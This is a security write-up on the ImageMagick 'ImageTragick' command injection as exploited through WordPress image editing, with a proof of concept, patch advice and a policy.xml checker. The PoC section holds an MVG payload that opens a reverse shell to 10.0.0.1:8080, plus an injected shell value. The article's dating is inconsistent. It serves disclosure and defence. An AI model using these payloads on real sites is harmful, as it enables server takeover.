Remote Code Execution in WordPress 4.5.1

Author: Sina Yeganeh

Email: [email protected]

Posted on 08-Apr-2017



ImageMagick

Imagick is a native PHP extension to create and modify images using the ImageMagick API.

ImageMagick is a software suite to create, edit, and compose bitmap images. It can read, convert and write images in a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000, PDF, PhotoCD, PNG, PostScript, SVG, and TIFF.

ImageMagick Vulnerability Information

A few days ago an ImageMagick vulnerability was disclosed: CVE-2016-3714.

The ReadImage function in MagickCore/constitute.c resolves the picture to be loaded; if the image address begins with https://, it calls InvokeDelegate.

Exploit ImageMagick

One of the default delegate commands uses the following to handle HTTPS requests:

"wget" -q -O "%o" "https:%M"

where %M is the actual link from the input. Because %M is substituted into a shell command line without sanitization, it is possible to pass a value like:

example.com"|ls "-la

How is WordPress affected?

WordPress selects a library for editing images, and its image processing uses the Imagick library by default.

If WordPress selects the Imagick library, it loads it.

wp_crop_image() calls get_attached_file() and passes the file to the Imagick library, which invokes the ImageMagick functions described above.

PoC

1. Upload a normal image. Log in to an account with Author permissions, publish an article, and insert the media.

2. Create an exploit.png file containing:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")'
pop graphic-context

Upload exploit.png and add it to the post.

3. Click on the normal picture, select Edit, then Edit Original.

4. Rotate/crop the image, then "Copy as cURL" the invoked link.

5. Click the broken image, then Edit and Edit Original. Check the requests listed in the network tab and find admin-ajax.php; look at the requests with type 'post' and copy the _ajax_nonce and postid parameters.

6. Paste the new parameters from the broken image into the cURL command copied before.

Proof of concept by getting a connect-back (change the bash command as you wish).

How do I know if my site is vulnerable?

Inspect the output of the phpinfo() function for "Imagick".

Run php -m | grep imagick on the command line.

How do I patch the vulnerability?

Currently the best known fix is to add a policy.xml file to your ImageMagick installation to limit the delegates that ImageMagick will use. Due to the ongoing nature of this issue, we recommend you refer to and follow https://imagetragick.com/ for instructions on how to handle the problem.

Documentation on the policy.xml file can be found at https://www.imagemagick.org/script/resources.php.
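One way to verify that an installed policy.xml actually denies the coders that reach the delegate command shown above, as an added example that is not from the slides or from ImageMagick itself: a small Python checker run against two constructed policy files (the coder list is the one published at imagetragick.com; the path of the real policy.xml on your host is an assumption you fill in).

```python
"""Check an ImageMagick policy.xml for the coder restrictions recommended at
imagetragick.com against CVE-2016-3714. Added example, not from the slides."""
import xml.etree.ElementTree as ET

# Coders to deny: URL/HTTPS reach the wget delegate shown above; MVG, MSL,
# EPHEMERAL, TEXT, SHOW, WIN and PLT let a crafted file name other files/coders.
REQUIRED_DENIED = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL",
                   "TEXT", "SHOW", "WIN", "PLT"}

def denied_coders(policy_xml: str) -> set:
    """Return the coder patterns that a policy.xml denies all rights to."""
    root = ET.fromstring(policy_xml)
    return {p.get("pattern", "").upper() for p in root.iter("policy")
            if p.get("domain") == "coder" and p.get("rights") == "none"}

def missing_restrictions(policy_xml: str) -> set:
    """Return the recommended coders that this policy does NOT deny."""
    return REQUIRED_DENIED - denied_coders(policy_xml)

# Constructed sample: a policy.xml that mostly sets resource limits.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
</policymap>"""

# Constructed sample: the policy shape recommended at imagetragick.com.
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="coder" rights="none" pattern="TEXT"/>
  <policy domain="coder" rights="none" pattern="SHOW"/>
  <policy domain="coder" rights="none" pattern="WIN"/>
  <policy domain="coder" rights="none" pattern="PLT"/>
</policymap>"""

if __name__ == "__main__":
    # On a real host read the installed file instead, e.g.
    # /etc/ImageMagick-6/policy.xml (assumed path; it varies by distribution).
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        missing = missing_restrictions(policy)
        print(name, "OK" if not missing else "missing " + ", ".join(sorted(missing)))
```

The weak sample reports every recommended coder except EPHEMERAL as missing, while the hardened sample reports OK.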

References:

http://www.imagemagick.org/

https://make.wordpress.org/core/2016/05/06/imagemagick-vulnerability-information/

https://access.redhat.com/security/vulnerabilities/2296071

http://www.secpulse.com/archives/45802.html